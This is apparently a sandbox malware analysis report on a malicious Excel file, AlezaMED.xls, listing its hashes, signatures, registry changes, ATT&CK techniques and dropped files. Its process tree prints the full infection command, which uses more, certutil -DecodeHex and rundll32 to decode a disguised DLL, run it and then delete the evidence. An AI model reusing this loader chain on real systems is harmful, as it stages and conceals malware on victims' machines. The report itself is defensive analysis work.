03d09bfd57e767cf1f87a74717297de4a48ed8ceec42ef6f77d1968dd9fc2df2

Analysis

max time kernel
102s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
30-05-2023 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AlezaMED.xls
Size

987KB
MD5

7cd6ff5343536a27080cf3125f1174ce
SHA1

da0d9a92c6a097e5b70fb9e8d680c212321ffa2a
SHA256

03d09bfd57e767cf1f87a74717297de4a48ed8ceec42ef6f77d1968dd9fc2df2
SHA512

de375ab60ab0d361adffca59ca807eb046fb0c76dd5872986ce92b74ffe7c9d3264adbaf8e843c344e32d31f6771c91721a8b70187704a3d80dbac54d0b45165
SSDEEP

12288:6h+ju8dTjV5FlT4Tl1BIxV5GixgBe2WFL+qlzL33WWRrNi+Q3pSjIi7:6hud//QT6xr36eJ0qV33WWTZIS

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1244	1708	cmd.EXe	27

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1252	rundll32.exe
3	1252	rundll32.exe

Loads dropped DLL 1 IoCs

pid	Process
1252	rundll32.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.app.log	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1708	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE
Token: SeRestorePrivilege	1708	EXCEL.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1708	EXCEL.EXE
1708	EXCEL.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 1244	1708	EXCEL.EXE	28
PID 1708 wrote to memory of 1244	1708	EXCEL.EXE	28
PID 1708 wrote to memory of 1244	1708	EXCEL.EXE	28
PID 1708 wrote to memory of 1244	1708	EXCEL.EXE	28
PID 1244 wrote to memory of 924	1244	cmd.EXe	30
PID 1244 wrote to memory of 924	1244	cmd.EXe	30
PID 1244 wrote to memory of 924	1244	cmd.EXe	30
PID 1244 wrote to memory of 924	1244	cmd.EXe	30
PID 1244 wrote to memory of 1056	1244	cmd.EXe	31
PID 1244 wrote to memory of 1056	1244	cmd.EXe	31
PID 1244 wrote to memory of 1056	1244	cmd.EXe	31
PID 1244 wrote to memory of 1056	1244	cmd.EXe	31
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32
PID 1244 wrote to memory of 1252	1244	cmd.EXe	32

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\AlezaMED.xls
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\SysWOW64\cmd.EXe
  C:\Windows\system32\cmd.EXe /C MORe /e +29 %TeMP%\ST.inf > %TeMP%\erf.tmp && cERtuTIL -DecodEHex %TeMP%\erf.tmp %TeMP%\mesr.jpg && rUndLl32 %TeMP%\mesr.jpg,main && del %TeMP%\erf.tmp && Del %TeMP%\mesr.jpg && del %TeMP%\ST.inf
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Windows\SysWOW64\more.com
    MORe /e +29 C:\Users\Admin\AppData\Local\Temp\ST.inf
    3⤵
    PID:924
- - C:\Windows\SysWOW64\certutil.exe
    cERtuTIL -DecodEHex C:\Users\Admin\AppData\Local\Temp\erf.tmp C:\Users\Admin\AppData\Local\Temp\mesr.jpg
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\rundll32.exe
    rUndLl32 C:\Users\Admin\AppData\Local\Temp\mesr.jpg,main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:1252

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ST.inf

Filesize
39KB

MD5
30ea6214d829695b8260b63c4b6cfd28

SHA1
0d7fe66554e3fe91e3397640813252b5551c16e3

SHA256
94702e589a47edae94ccce0dd4640fa0869ba448d4ce6566b04a85da314c5ef4

SHA512
3f5295e33386b8c32d4b6337eb309bfee1915f77e0758b87400a62a5e158849d2ed499baa3ef78ec6986463b7f0f4896bcd9b1b8e4a8d96ecf1c3e2ce934bfb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\erf.tmp

Filesize
39KB

MD5
fb6faa684ba00d880cc09d58ad623628

SHA1
209ceb57c137b4c8d5daeddea833ee69b872c868

SHA256
37c6bf6e7ab0804374edc4b63dad030318721726f9e7533908c36547d38b5508

SHA512
2a07baf714abf1b9334f83b505cfa654fa82bdc91d2acac5e01e9e3be86ddb40d32d5279936962dc736a7258e6bd35ba168c77674deb692ca0d71b9e4476b562

Download Submit
C:\Users\Admin\AppData\Local\Temp\mesr.jpg

Filesize
19KB

MD5
87a614f3f1092c537049feba52de7586

SHA1
406650ae261ef400314bb263b1994c6b0d9f16f7

SHA256
4b56bf5d3ab5ac1cd0acd14b18d1011582a1c56a02c2de1635306ec79c7276ba

SHA512
8499f20405b5d27642240b52bb41a81dabc5c7f28cf35163108adc88c666e1555ad21548adc7c4ff5c57c01383b6fba15b55a70f70a15a8de29ae3efa383cd5a

Download Submit
\Users\Admin\AppData\Local\Temp\mesr.jpg

Filesize
19KB

MD5
87a614f3f1092c537049feba52de7586

SHA1
406650ae261ef400314bb263b1994c6b0d9f16f7

SHA256
4b56bf5d3ab5ac1cd0acd14b18d1011582a1c56a02c2de1635306ec79c7276ba

SHA512
8499f20405b5d27642240b52bb41a81dabc5c7f28cf35163108adc88c666e1555ad21548adc7c4ff5c57c01383b6fba15b55a70f70a15a8de29ae3efa383cd5a

Download Submit
memory/1252-1765-0x0000000009F20000-0x0000000009F2A000-memory.dmp

Filesize
40KB

Download
memory/1708-95-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-125-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-68-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-69-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-70-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-71-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-72-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-73-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-74-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-75-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-97-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-77-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-78-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-80-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-79-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-81-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-83-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-84-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-86-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-87-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-85-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-82-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-88-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-89-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-90-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-92-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-91-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-93-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-94-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1708-127-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-67-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-76-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-99-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-101-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-100-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-102-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-103-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-104-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-106-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-107-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-105-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-108-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-109-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-110-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-111-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-112-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-113-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-114-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-115-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-117-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-116-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-118-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-119-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-120-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-121-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-122-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-123-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-124-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-98-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-128-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-96-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
memory/1708-126-0x00000000005B0000-0x00000000006B0000-memory.dmp

Filesize
1024KB

Download
